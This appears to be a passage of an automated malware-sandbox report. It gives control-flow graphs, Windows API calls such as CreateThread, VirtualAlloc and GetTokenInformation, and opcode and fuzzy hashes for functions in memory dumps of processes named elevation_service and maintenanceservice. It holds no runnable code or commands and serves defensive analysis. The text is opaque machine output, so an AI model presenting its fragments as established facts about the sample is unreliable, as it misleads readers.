                                                                                                                                                                                control_flow_graph 251 895d50-895d5b CreateThread 252 895c78 251->252 253 895d1f-895d45 252->253 254 895c7e 252->254 257 895cd4-895cea CreateThread CloseHandle 253->257 258 895d47 253->258 254->253 255 895c84-895dc8 call 895e60 call 895990 254->255 279 895dcd 255->279 261 895d8b-895d92 257->261 262 895cf0-895d4d 257->262 258->257 265 895d9c 261->265 266 895d94 261->266 262->266 270 895da5-895db6 call 8952d0 265->270 271 895c2c-895c2f 266->271 272 895cb3 266->272 283 895dbc 270->283 284 895c30-895c39 270->284 272->271 274 895cb9-895cbd 272->274 277 895cc3 274->277 278 895d56-895d5b CreateThread 274->278 277->278 281 895cc9 277->281 278->252 279->279 281->278 285 895d7d-895d89 283->285 286 895dbe 283->286 284->274 291 895bf7 284->291 285->261 285->266 286->285 292 895d9b 286->292 291->274 293 895bfd-895c06 291->293 292->265 293->270
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction ID: 19712bd3b078e37e0d7036f213657200f32783deb7ea8cd5bb8c5adca78bb7cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6DB01206228F8B8A0C2F373004081284580FF46A3C9BD1F7C9FB3D6CD2E8002C04A324
                                                                                                                                                                                Function 00895990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 295 895990-89599b 297 8959a1 295->297 298 895a33-895a61 call 8c9b00 295->298 297->298 300 8959a7-8959ab 297->300 308 895a63 298->308 309 895ab4-895aba call 8b1080 298->309 304 895a59 300->304 305 8959b1-8959f3 call 8c2320 300->305 306 895a5b 304->306 307 895a25-895a2d 304->307 305->304 326 8959f5-8959fa 305->326 306->307 318 895a23 306->318 315 895a2f 307->315 316 895a70-895a7b 307->316 308->309 313 895a65 308->313 327 895a83-895a88 call 895df0 309->327 328 895a13 309->328 313->316 315->313 319 895a7d 316->319 320 895a16-895a1e call 8b1470 316->320 324 895a24 318->324 319->320 325 895a7f-895a81 319->325 335 895a96-895ac2 320->335 325->327 330 8959fc 326->330 331 895a51-895a54 call 8c233c 326->331 338 895a8d VirtualAlloc 327->338 328->327 334 895a15 328->334 330->331 332 8959fe-895a02 330->332 331->304 332->331 334->320 335->324 339 895ac8 335->339 338->335 339->324 340 895ace 339->340 340->298
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1284135714-0
                                                                                                                                                                                • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction ID: 68d4dd3089a7c95b7d2408ae3881b7c0a9fafc09eccb7c313147f07dea548c50
                                                                                                                                                                                • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4321D92051DEA88FDF6BB32C54956B925E2F7A5328F5C03CBD086CB192C9284D05834F
                                                                                                                                                                                Function 00898245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 342 898245-898247 343 89824d-89824f 342->343 344 8982d2-8982d7 342->344 345 898251-898260 call 8c72f4 343->345 346 898306-898309 344->346 353 898390-898393 345->353 348 89830b-898311 CloseHandle 346->348 349 89832e-898330 346->349 348->349 351 8982dd-8982e3 349->351 352 898332 349->352 354 8982e9 351->354 355 8983a3-8983a4 351->355 352->351 356 898334 352->356 358 898399 353->358 359 89827e 353->359 354->355 360 8982ef 354->360 357 89f524-89f52e 356->357 362 89f807 357->362 358->359 361 89839f-8983a1 358->361 359->348 363 898284 359->363 366 8982f0-89831c 360->366 361->355 364 89f80d 362->364 365 89f8df-89f8e0 362->365 363->349 364->365 367 89f813 364->367 369 8a15a5-8a15aa 365->369 376 898322 366->376 377 8981e5 366->377 373 89f81b 367->373 374 89f78f 367->374 371 8a15ae-8a15af 369->371 375 8a15b2-8a15b7 371->375 373->365 374->373 378 89f795 374->378 379 8a15ba-8a15c1 375->379 376->377 382 898328-89832c 376->382 380 8981eb 377->380 381 8982a3-8982a5 377->381 378->362 385 8a1750-8a17a2 call 8c72f4 379->385 386 8a15c7-8a15d2 379->386 387 8981f1 380->387 388 8982b2-89836f GetTokenInformation 380->388 383 8983f9 381->383 384 8982ab 381->384 382->349 389 8982c5-8982c8 382->389 383->344 397 8983ff 383->397 384->383 390 8982b1 384->390 392 8a1620-8a1623 386->392 393 8a15d4-8a15d6 386->393 387->388 394 8981f7-89828e 387->394 412 898376-89837b 388->412 389->383 396 8982ce 389->396 390->388 404 8a16a0-8a16b4 392->404 405 8a1625-8a1628 392->405 399 8a15dc-8a15df 393->399 400 8a1670-8a1684 393->400 402 89828f-898303 call 8c72ec 394->402 396->402 403 8982d0 396->403 397->357 399->379 410 8a15e1-8a15f6 399->410 400->369 407 8a168a-8a168d 400->407 402->346 432 89834f-898355 402->432 403->344 403->402 408 8a16b6-8a16b9 404->408 409 8a16f4-8a16f5 404->409 405->379 411 8a162a-8a1636 405->411 414 8a172f-8a1738 407->414 415 8a1693-8a1697 407->415 416 8a173a-8a173b 408->416 417 8a16bb 408->417 427 8a16fe-8a170c 409->427 418 8a15fc-8a1600 410->418 419 8a16d2-8a16d7 410->419 420 8a1638-8a1640 411->420 421 8a16dc-8a16ec 411->421 412->366 422 898381 412->422 423 8a173f-8a1740 414->423 426 8a16bf-8a16cd 415->426 416->423 417->426 418->427 428 8a1606-8a1618 418->428 419->371 430 8a170e-8a1727 420->430 431 8a1646-8a165f 420->431 421->386 429 8a16f2 421->429 422->366 424 898387 422->424 434 8a1744-8a1748 423->434 424->353 433 898277-89827a 424->433 427->434 428->375 429->385 430->386 435 8a172d 430->435 431->386 436 8a1665 431->436 440 898341 432->440 441 898212-89821a GetTokenInformation 432->441 437 89827c 433->437 438 898241 433->438 435->385 436->385 437->359 437->438 438->345 438->412 440->441 444 898347 440->444 442 8983af 441->442 443 898220-898234 441->443 442->345 445 8983b5 442->445 451 89823a 443->451 452 8983d7-8983dd 443->452 444->420 446 89834d 444->446 445->345 448 8983bb-8983ca 445->448 446->432 448->433 457 8983d0 448->457 451->452 453 898240 451->453 455 8ab32e-8ab330 453->455 458 8ab332-8ab337 call 8c72f4 455->458 459 8ab300 455->459 457->433 460 8983d6 457->460 458->459 468 8ab339 458->468 463 8ab2fd 459->463 464 8ab302 459->464 466 8ab2ff 463->466 467 8ab305 463->467 469 8ab308-8ab315 466->469 467->469 470 8ab322-8ab32d 467->470 468->459 471 8ab33b-8ab33f 468->471 469->467 473 8ab317 469->473 470->455 471->469 473->463
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction ID: 7fd1ede4c6f6034d271c6854a6654a0471147db58a80774a6158c8fdce7f3c4d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction Fuzzy Hash: 80F0D13461DA8ACFCE6AB758905053A6BA0FF42704F6D00AAE487CBA17CE14DC01E752
                                                                                                                                                                                Function 008983E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 605 8983e7-8983e9 606 8983ef 605->606 607 8982c5-8982c8 605->607 606->607 610 8983f5-8983f7 606->610 608 8983f9 607->608 609 8982ce 607->609 613 8983ff 608->613 614 8982d2-8982d7 608->614 611 89828f-898303 call 8c72ec 609->611 612 8982d0 609->612 610->608 617 898306-898309 611->617 627 89834f-898355 611->627 612->611 612->614 616 89f524-89f52e 613->616 614->617 619 89f807 616->619 620 89830b-898311 CloseHandle 617->620 621 89832e-898330 617->621 623 89f80d 619->623 624 89f8df-89f8e0 619->624 620->621 625 8982dd-8982e3 621->625 626 898332 621->626 623->624 628 89f813 623->628 632 8a15a5-8a15aa 624->632 629 8982e9 625->629 630 8983a3-8983a4 625->630 626->625 631 898334 626->631 639 898341 627->639 640 898212-89821a GetTokenInformation 627->640 637 89f81b 628->637 638 89f78f 628->638 629->630 635 8982ef 629->635 631->616 636 8a15ae-8a15af 632->636 646 8982f0-89831c 635->646 641 8a15b2-8a15b7 636->641 637->624 638->637 642 89f795 638->642 639->640 645 898347 639->645 643 8983af 640->643 644 898220-898234 640->644 647 8a15ba-8a15c1 641->647 642->619 648 898251-898256 call 8c72f4 643->648 649 8983b5 643->649 669 89823a 644->669 670 8983d7-8983dd 644->670 650 8a1638-8a1640 645->650 651 89834d 645->651 671 898322 646->671 672 8981e5 646->672 654 8a1750-8a17a2 call 8c72f4 647->654 655 8a15c7-8a15d2 647->655 666 89825b-898260 648->666 649->648 656 8983bb-8983ca 649->656 658 8a170e-8a1727 650->658 659 8a1646-8a165f 650->659 651->627 663 8a1620-8a1623 655->663 664 8a15d4-8a15d6 655->664 705 8983d0 656->705 706 898277-89827a 656->706 658->655 667 8a172d 658->667 659->655 668 8a1665 659->668 677 8a16a0-8a16b4 663->677 678 8a1625-8a1628 663->678 674 8a15dc-8a15df 664->674 675 8a1670-8a1684 664->675 676 898390-898393 666->676 667->654 668->654 669->670 682 898240 669->682 671->672 687 898328-89832c 671->687 683 8981eb 672->683 684 8982a3-8982a5 672->684 674->647 688 8a15e1-8a15f6 674->688 675->632 679 8a168a-8a168d 675->679 680 898399 676->680 681 89827e 676->681 685 8a16b6-8a16b9 677->685 686 8a16f4-8a16f5 677->686 678->647 690 8a162a-8a1636 678->690 697 8a172f-8a1738 679->697 698 8a1693-8a1697 679->698 680->681 699 89839f-8983a1 680->699 681->620 693 898284 681->693 701 8ab32e-8ab330 682->701 691 8981f1 683->691 692 8982b2-89836f GetTokenInformation 683->692 684->608 700 8982ab 684->700 702 8a173a-8a173b 685->702 703 8a16bb 685->703 711 8a16fe-8a170c 686->711 687->607 687->621 694 8a15fc-8a1600 688->694 695 8a16d2-8a16d7 688->695 690->650 696 8a16dc-8a16ec 690->696 691->692 710 8981f7 691->710 723 898376-89837b 692->723 693->621 694->711 712 8a1606-8a1618 694->712 695->636 696->655 716 8a16f2 696->716 707 8a173f-8a1740 697->707 713 8a16bf-8a16cd 698->713 699->630 700->608 714 8982b1 700->714 717 8ab332-8ab337 call 8c72f4 701->717 718 8ab300 701->718 702->707 703->713 705->706 719 8983d6 705->719 708 89827c 706->708 709 898241 706->709 720 8a1744-8a1748 707->720 708->681 708->709 709->648 709->723 721 89828e 710->721 711->720 712->641 714->692 716->654 717->718 732 8ab339 717->732 725 8ab2fd 718->725 726 8ab302 718->726 721->611 723->646 727 898381 723->727 730 8ab2ff 725->730 731 8ab305 725->731 727->646 729 898387 727->729 729->676 729->706 733 8ab308-8ab315 730->733 731->733 734 8ab322-8ab32d 731->734 732->718 735 8ab33b-8ab33f 732->735 733->731 737 8ab317 733->737 734->701 735->733 737->725
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction ID: 80ec2b36202b26a7941b381228f421e10059df16ee01e528825ee0c6f5256df8
                                                                                                                                                                                • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction Fuzzy Hash: B5F0903561CA4BDBCE7DB7948480A362760FB53708F6C40A9D546DBA23CE24DC01E752
                                                                                                                                                                                Function 00898318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 474 898318-89831c 475 898322 474->475 476 8981e5 474->476 475->476 479 898328-89832c 475->479 477 8981eb 476->477 478 8982a3-8982a5 476->478 482 8981f1 477->482 483 8982b2-89836f GetTokenInformation 477->483 480 8983f9 478->480 481 8982ab 478->481 484 89832e-898330 479->484 485 8982c5-8982c8 479->485 490 8983ff 480->490 491 8982d2-8982d7 480->491 481->480 486 8982b1 481->486 482->483 487 8981f7-89828e 482->487 506 898376-89837b 483->506 492 8982dd-8982e3 484->492 493 898332 484->493 485->480 489 8982ce 485->489 486->483 495 89828f-898303 call 8c72ec 487->495 489->495 496 8982d0 489->496 497 89f524-89f52e 490->497 498 898306-898309 491->498 499 8982e9 492->499 500 8983a3-8983a4 492->500 493->492 501 898334 493->501 495->498 516 89834f-898355 495->516 496->491 496->495 503 89f807 497->503 498->484 504 89830b-898311 CloseHandle 498->504 499->500 505 8982ef 499->505 501->497 508 89f80d 503->508 509 89f8df-89f8e0 503->509 504->484 511 8982f0-89831c 505->511 510 898381 506->510 506->511 508->509 514 89f813 508->514 517 8a15a5-8a15aa 509->517 510->511 512 898387 510->512 511->475 511->476 518 898390-898393 512->518 519 898277-89827a 512->519 527 89f81b 514->527 528 89f78f 514->528 534 898341 516->534 535 898212-89821a GetTokenInformation 516->535 521 8a15ae-8a15af 517->521 522 898399 518->522 523 89827e 518->523 524 89827c 519->524 525 898241 519->525 530 8a15b2-8a15b7 521->530 522->523 531 89839f-8983a1 522->531 523->504 532 898284 523->532 524->523 524->525 525->506 536 898251-898260 call 8c72f4 525->536 527->509 528->527 533 89f795 528->533 537 8a15ba-8a15c1 530->537 531->500 532->484 533->503 534->535 541 898347 534->541 538 8983af 535->538 539 898220-898234 535->539 536->518 542 8a1750-8a17a2 call 8c72f4 537->542 543 8a15c7-8a15d2 537->543 538->536 544 8983b5 538->544 565 89823a 539->565 566 8983d7-8983dd 539->566 546 8a1638-8a1640 541->546 547 89834d 541->547 550 8a1620-8a1623 543->550 551 8a15d4-8a15d6 543->551 544->536 552 8983bb-8983ca 544->552 553 8a170e-8a1727 546->553 554 8a1646-8a165f 546->554 547->516 560 8a16a0-8a16b4 550->560 561 8a1625-8a1628 550->561 557 8a15dc-8a15df 551->557 558 8a1670-8a1684 551->558 552->519 586 8983d0 552->586 553->543 562 8a172d 553->562 554->543 563 8a1665 554->563 557->537 569 8a15e1-8a15f6 557->569 558->517 564 8a168a-8a168d 558->564 567 8a16b6-8a16b9 560->567 568 8a16f4-8a16f5 560->568 561->537 570 8a162a-8a1636 561->570 562->542 563->542 571 8a172f-8a1738 564->571 572 8a1693-8a1697 564->572 565->566 573 898240 565->573 574 8a173a-8a173b 567->574 575 8a16bb 567->575 584 8a16fe-8a170c 568->584 576 8a15fc-8a1600 569->576 577 8a16d2-8a16d7 569->577 570->546 579 8a16dc-8a16ec 570->579 580 8a173f-8a1740 571->580 581 8a16bf-8a16cd 572->581 582 8ab32e-8ab330 573->582 574->580 575->581 576->584 585 8a1606-8a1618 576->585 577->521 579->543 587 8a16f2 579->587 588 8a1744-8a1748 580->588 589 8ab332-8ab337 call 8c72f4 582->589 590 8ab300 582->590 584->588 585->530 586->519 591 8983d6 586->591 587->542 589->590 599 8ab339 589->599 594 8ab2fd 590->594 595 8ab302 590->595 597 8ab2ff 594->597 598 8ab305 594->598 600 8ab308-8ab315 597->600 598->600 601 8ab322-8ab32d 598->601 599->590 602 8ab33b-8ab33f 599->602 600->598 604 8ab317 600->604 601->582 602->600 604->594
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 0089830B
                                                                                                                                                                                • GetTokenInformation.KERNELBASE ref: 00898369
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleInformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3954737543-0
                                                                                                                                                                                • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction ID: be687cbd7259c6b5ca9c83004150f1762e1af45143a564ec6c5e8165f761b89d
                                                                                                                                                                                • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF06D3451964BDB8E69BB54848053537A0FF23758F6C4069D546DB623CE24DC02EB52

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:56
                                                                                                                                                                                Total number of Limit Nodes:3
                                                                                                                                                                                execution_graph 3621 1a583e7 3624 1a581e5 3621->3624 3622 1a5830b CloseHandle 3622->3624 3623 1a58212 GetTokenInformation 3623->3624 3624->3622 3624->3623 3625 1a58357 GetTokenInformation 3624->3625 3626 1a581f7 3624->3626 3625->3624 3627 1a55d50 CreateThread 3629 1a55bbc 3627->3629 3628 1a55cd4 CreateThread CloseHandle 3628->3629 3629->3628 3630 1a55c84 3629->3630 3631 1a55c2c 3629->3631 3633 1a55d56 CreateThread 3629->3633 3635 1a55990 3630->3635 3633->3629 3634 1a55dcd 3634->3634 3637 1a55994 wcscpy 3635->3637 3636 1a55a23 3636->3634 3637->3636 3638 1a55a8d VirtualAlloc 3637->3638 3638->3637 3667 1a581e3 3670 1a581e5 3667->3670 3668 1a58357 GetTokenInformation 3668->3670 3669 1a5830b CloseHandle 3669->3670 3670->3668 3670->3669 3671 1a58212 GetTokenInformation 3670->3671 3672 1a581f7 3670->3672 3671->3670 3678 1a55d22 3679 1a55cd4 CreateThread CloseHandle 3678->3679 3682 1a55bbc 3678->3682 3679->3682 3680 1a55c2c 3681 1a55d56 CreateThread 3681->3682 3682->3679 3682->3680 3682->3681 3683 1a55c84 3682->3683 3684 1a55990 VirtualAlloc 3683->3684 3685 1a55dcd 3684->3685 3685->3685 3639 1a55b8f 3650 1a653f0 3639->3650 3641 1a55baf 3655 1a581c0 3641->3655 3643 1a55c2c 3644 1a55c84 3645 1a55990 VirtualAlloc 3644->3645 3646 1a55dcd 3645->3646 3646->3646 3647 1a55d56 CreateThread 3648 1a55bbc 3647->3648 3648->3643 3648->3644 3648->3647 3649 1a55cd4 CreateThread CloseHandle 3648->3649 3649->3648 3651 1a653f4 3650->3651 3652 1a6545e VirtualAlloc 3651->3652 3654 1a653f6 3651->3654 3653 1a65460 3652->3653 3653->3651 3654->3641 3658 1a581e5 3655->3658 3656 1a58357 GetTokenInformation 3656->3658 3657 1a5830b CloseHandle 3657->3658 3658->3648 3658->3656 3658->3657 3659 1a58212 GetTokenInformation 3658->3659 3660 1a581f7 3658->3660 3659->3658 3660->3648 3673 1a558de 3674 1a653f0 VirtualAlloc 3673->3674 3675 1a558f9 3674->3675 3676 1a581c0 3 API calls 3675->3676 3677 1a55907 3675->3677 3676->3677

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 01A581C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 1a581c0-1a581d8 1 1a581e5 0->1 2 1a583bf-1a583ca 0->2 3 1a582a3-1a582a5 1->3 4 1a581eb 1->4 10 1a58277-1a5827a 2->10 11 1a583d0 2->11 6 1a583f9 3->6 7 1a582ab 3->7 8 1a581f1 4->8 9 1a582b2-1a582bc 4->9 12 1a582d2-1a582d7 6->12 13 1a583ff 6->13 7->6 14 1a582b1 7->14 8->9 15 1a581f7 8->15 16 1a582c5-1a582c8 9->16 17 1a58357-1a5836f GetTokenInformation 9->17 18 1a58241 10->18 19 1a5827c 10->19 11->10 20 1a583d6 11->20 23 1a58306-1a58309 12->23 26 1a5f524-1a5f52e 13->26 14->9 22 1a5828e 15->22 16->6 21 1a582ce 16->21 25 1a58376-1a5837b 17->25 18->25 19->18 24 1a5827e 19->24 27 1a582d0 21->27 28 1a5828f-1a58303 call 1a872ec 21->28 29 1a5832e-1a58330 23->29 30 1a5830b-1a58311 CloseHandle 23->30 24->30 33 1a58284 24->33 34 1a58381 25->34 35 1a582f0-1a5831c 25->35 37 1a5f807 26->37 27->12 27->28 28->23 53 1a5834f-1a58355 28->53 31 1a58332 29->31 32 1a582dd-1a582e3 29->32 30->29 31->32 38 1a58334 31->38 44 1a583a3-1a583a4 32->44 45 1a582e9 32->45 33->22 33->29 34->35 40 1a58387 34->40 35->1 59 1a58322 35->59 42 1a5f80d 37->42 43 1a5f8df-1a5f8e0 37->43 38->26 40->10 42->43 49 1a5f813 42->49 54 1a615a5-1a615aa 43->54 48 1a583af 44->48 45->44 46 1a582ef 45->46 46->35 51 1a583b5 48->51 52 1a58251-1a58256 call 1a872f4 48->52 60 1a5f78f 49->60 61 1a5f81b 49->61 51->52 57 1a583bb-1a583bd 51->57 63 1a5825b-1a58393 52->63 67 1a58341 53->67 68 1a58212-1a5821a GetTokenInformation 53->68 58 1a615ae-1a615af 54->58 57->2 64 1a615b2-1a615b7 58->64 59->1 65 1a58328-1a5832c 59->65 60->61 66 1a5f795 60->66 61->43 63->24 73 1a58399 63->73 71 1a615ba-1a615c1 64->71 65->16 65->29 66->37 67->68 72 1a58347 67->72 68->48 70 1a58220-1a58234 68->70 97 1a583d7-1a583dd 70->97 98 1a5823a 70->98 75 1a615c7-1a615d2 71->75 76 1a61750-1a617a2 call 1a872f4 71->76 77 1a5834d 72->77 78 1a61638-1a61640 72->78 73->24 81 1a5839f-1a583a1 73->81 83 1a615d4-1a615d6 75->83 84 1a61620-1a61623 75->84 77->53 79 1a61646-1a6165f 78->79 80 1a6170e-1a61727 78->80 79->75 88 1a61665 79->88 80->75 87 1a6172d 80->87 81->44 91 1a61670-1a61684 83->91 92 1a615dc-1a615df 83->92 85 1a61625-1a61628 84->85 86 1a616a0-1a616b4 84->86 85->71 93 1a6162a-1a61636 85->93 95 1a616b6-1a616b9 86->95 96 1a616f4-1a616f5 86->96 87->76 88->76 91->54 94 1a6168a-1a6168d 91->94 92->71 99 1a615e1-1a615f6 92->99 93->78 100 1a616dc-1a616ec 93->100 101 1a61693-1a61697 94->101 102 1a6172f-1a61738 94->102 103 1a6173a-1a6173b 95->103 104 1a616bb 95->104 108 1a616fe-1a6170c 96->108 97->6 98->97 105 1a58240 98->105 106 1a616d2-1a616d7 99->106 107 1a615fc-1a61600 99->107 100->75 112 1a616f2 100->112 110 1a616bf-1a616cd 101->110 109 1a6173f-1a61740 102->109 103->109 104->110 111 1a6b32e-1a6b330 105->111 106->58 107->108 114 1a61606-1a61618 107->114 115 1a61744-1a61748 108->115 109->115 116 1a6b332-1a6b337 call 1a872f4 111->116 117 1a6b300-1a6b302 111->117 112->76 114->64 116->117 122 1a6b339 116->122 122->117 123 1a6b33b-1a6b33f 122->123 126 1a6b317 123->126 127 1a6b305-1a6b32d 123->127 126->127 130 1a6b2ff 126->130 127->111 130->117
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ae4adefb757c2f7bfae9a497276093c87e63d2f7c7ef2749170ec006675e2169
                                                                                                                                                                                • Instruction ID: 5e476c11b4b1397b1e546c9e3a45ab82526ffac0de769649161fa9dea5dd4a47
                                                                                                                                                                                • Opcode Fuzzy Hash: ae4adefb757c2f7bfae9a497276093c87e63d2f7c7ef2749170ec006675e2169
                                                                                                                                                                                • Instruction Fuzzy Hash: 3EB1183060DE458BDB6ACB2E8480239BFB5FFD5354F1C8259DCABC7566DA389802C752
                                                                                                                                                                                Function 01A55B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 131 1a55b8f-1a55c20 call 1a653f0 call 1a88358 call 1a70320 call 1a581c0 141 1a55cf4-1a55d08 call 1a872ec 131->141 142 1a55c26 131->142 146 1a55c87-1a55dc8 call 1a55e60 call 1a55990 141->146 147 1a55d0e 141->147 142->141 143 1a55c2c-1a55c2f 142->143 160 1a55dcd 146->160 147->146 149 1a55d14-1a55d18 147->149 153 1a55c65 149->153 154 1a55daf-1a55db6 call 1a552d0 149->154 156 1a55c67 153->156 157 1a55ca3 call 1a55df0 153->157 164 1a55c30-1a55c39 154->164 165 1a55dbc 154->165 156->157 162 1a55c69-1a55c9d 156->162 170 1a55c45-1a55d6d call 1a71520 157->170 160->160 179 1a55c85 162->179 180 1a55c9f 162->180 182 1a55bf7 164->182 183 1a55cb9-1a55cbd 164->183 167 1a55d7d-1a55d89 165->167 168 1a55dbe 165->168 176 1a55d94 167->176 177 1a55d8b-1a55d92 167->177 168->167 178 1a55d9b 168->178 190 1a55bfd-1a55c06 170->190 193 1a55d73 170->193 176->143 194 1a55cb3 176->194 177->176 186 1a55d9c 177->186 178->186 179->146 180->179 188 1a55ca1 180->188 182->183 182->190 184 1a55d56-1a55d5b CreateThread 183->184 185 1a55cc3 183->185 196 1a55d1f-1a55d45 184->196 197 1a55c7e 184->197 185->184 192 1a55cc9 185->192 199 1a55da5-1a55da8 186->199 188->157 190->199 192->184 193->190 198 1a55d79-1a55d7b 193->198 194->143 194->183 202 1a55cd4-1a55cea CreateThread CloseHandle 196->202 203 1a55d47 196->203 197->196 200 1a55c84 197->200 198->167 199->154 200->179 202->177 204 1a55cf0-1a55d4d 202->204 203->202 204->176
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: e247c548eaeea6e430a8624bf88735aaaf0c0aeaa4e38e5d31d111ebab7650c3
                                                                                                                                                                                • Instruction ID: 2b58528c000bb89fa00857edd094f75ac74673392f82ed18156776d0afb28010
                                                                                                                                                                                • Opcode Fuzzy Hash: e247c548eaeea6e430a8624bf88735aaaf0c0aeaa4e38e5d31d111ebab7650c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 7641E932E1CA098FDBEDD76C945C3397AF1EB55310F4C0296DD06CB1A2EA35940A8755
